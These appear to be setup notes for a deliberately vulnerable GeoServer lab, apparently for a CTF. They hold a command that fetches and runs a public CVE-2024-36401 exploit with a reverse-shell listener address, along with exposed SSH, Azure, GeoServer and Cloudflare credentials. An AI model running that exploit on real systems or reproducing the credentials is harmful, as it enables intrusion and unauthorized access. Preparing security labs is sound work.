2.17.0 zafiyetli versiyon: https://www.geoserver.com.tr/geoserver-2-17-0-indir/ SSH: sshpass -p "j0U;Q0X7>3eX" ssh azureuser@4.233.193.243 az ssh vm --resource-group ubuntu --vm-name ubuntu --subscription 4762238c-db18-4cc5-9d1d-8985a7a66f6f azureuser j0U;Q0X7>3eX cve.py: wget https://raw.githubusercontent.com/bigb0x/CVE-2024-36401/main/cve-2024-36401.py python3 cve-2024-36401.py -u http://4.233.193.243 -i 94.237.91.179 -p 4444 -type sf:archsites works: sudo docker run --ulimit nofile=65536:65536 -p 80:8080 --name geoserver -v /home/azureuser/Desktop/logs:/var/log/log.txt --privileged --rm -it im-geoserver /bin/bash nsjail --user geoserver --group geoserver --disable_proc --keep_env --hostname geo --disable_rlimits --chroot / --disable_clone_newnet --keep_caps --log /var/log/logs.txt --rw --disable_clone_newuser -- ./usr/share/geoserver/bin/startup.sh # Delete all containers sudo docker rm $(sudo docker ps -a -q) # Delete all images sudo docker rmi $(sudo docker images -q) https://cert.pl/en/posts/2018/07/technical-aspects-of-ctf-contest-organization/ ## docker compose docker-compose down --rmi all --volumes --remove-orphans docker-compose up --build --force-recreate iptables -P OUTPUT DROP iptables -A OUTPUT -d 172.18.0.0/16 -j ACCEPT ### geoserver creds change-> admin: ,vJ01sFe;/Z-"xxUu[A#y asel: f/5M/'£|0£#7s0}t%nn9? z.konur: f/5M/'£|0£#7s0}t%nn9? /usr/share/geoserver/data_dir/security/usergroup/default ### auditd https://medium.com/@elcinuyanik/audit-f15b54877637 ## cloudflare password: aa4833915c9bb4f3667e9c26 https://sourceforge.net/projects/geoserver/files/GeoServer/2.22.0/geoserver-2.22.0-bin.zip/download setfacl -m u:dockeruser:rw- /path/to/host/logfile.log cp /home/azureuser/Geo-Source/geoserver-2.23.5/src/web/app/target/geoserver.war . https://stackoverflow.com/questions/27033210/tomcat-started-but-application-is-not-running